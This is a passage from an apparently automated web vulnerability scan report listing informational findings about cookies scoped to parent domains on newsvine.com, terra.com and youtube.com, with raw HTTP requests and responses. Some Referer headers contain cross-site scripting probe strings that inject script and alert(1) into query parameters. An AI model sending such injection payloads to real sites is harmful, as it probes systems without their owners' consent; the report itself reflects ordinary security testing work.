Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Connection: close

[]

16.281. http://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/logout

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F412586518
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


16.282. http://www.newsvine.com/_action/user/startTracking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/startTracking

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

16.283. http://www.newsvine.com/_action/user/stopTracking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/stopTracking

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

16.284. http://www.newsvine.com/_api/comments/getComments

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/comments/getComments

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/comments/getComments HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:32 GMT
Content-Length: 65
Content-Type: application/json
Connection: close

           
{"response":{"article":[{"contentId":-1,"totalComments":0}]}}

16.285. http://www.newsvine.com/_api/question/getUserData

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/question/getUserData

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_api/question/getUserData HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com
Set-Cookie: sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:30 GMT
Content-Length: 244
Content-Type: application/json
Connection: close

           
{"response":{"user":{"domainName":"","displayName":"","state":"0","zip":"","city":"Washington, DC","country":"United States","url":"http:\/\/www.newsvine.com","avatar":"http:\/\/www.polls.newsvine
...[SNIP]...

16.286. http://www.newsvine.com/_api/user/convTracker

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/user/convTracker

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/user/convTracker HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:37 GMT
Content-Length: 304
Content-Type: application/json
Connection: close

{"tracker":{"a":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage":5}},"t":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage
...[SNIP]...

16.287. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_nv/accounts/newsvine/emailAlerts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:13:08 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/newsvine/emailAlerts
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


16.288. http://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:26 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/api/accounts/login
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


16.289. http://www.newsvine.com/_tools/user/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/user/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 17589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.290. http://www.newsvine.com/_vine/js/m1/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_vine/js/m1/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_vine/js/m1/global.js?v=23247 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:20:53 GMT
Content-Length: 383
Content-Type: text/javascript


var globalPokeURL = 'http://log.newsvine.com/poke.gif';
var globalImgRoot = 'http://www.newsvine.com/_vine/images/_/';
var globalRegisterRoot = 'https://www.newsvine.com/_nv/accounts/register';
v
...[SNIP]...

16.291. https://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

16.292. https://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_action/user/logout

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:20:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


16.293. https://www.newsvine.com/_nv/accounts/global/information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


16.294. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

16.295. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


16.296. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...

16.297. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

16.298. https://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Content-Length: 97
Content-Type: application/json
Connection: close

{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}

16.299. https://www.newsvine.com/_nv/api/accounts/resetPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:02 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:15:02 GMT
Vary: Accept-Encoding
Content-Length: 100
Content-Type: application/json
Connection: close

{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}

16.300. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.terra.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Status: 404 Not Found
Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com
Connection: close


16.301. http://www.youtube.com/embed/CKZzn00w01M

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/CKZzn00w01M

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/CKZzn00w01M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9225

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Egyptian Cartoonist Operates Just Under the Censorship Radar</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrz
...[SNIP]...

16.302. http://www.youtube.com/embed/mm8byzo8zWE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/mm8byzo8zWE

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
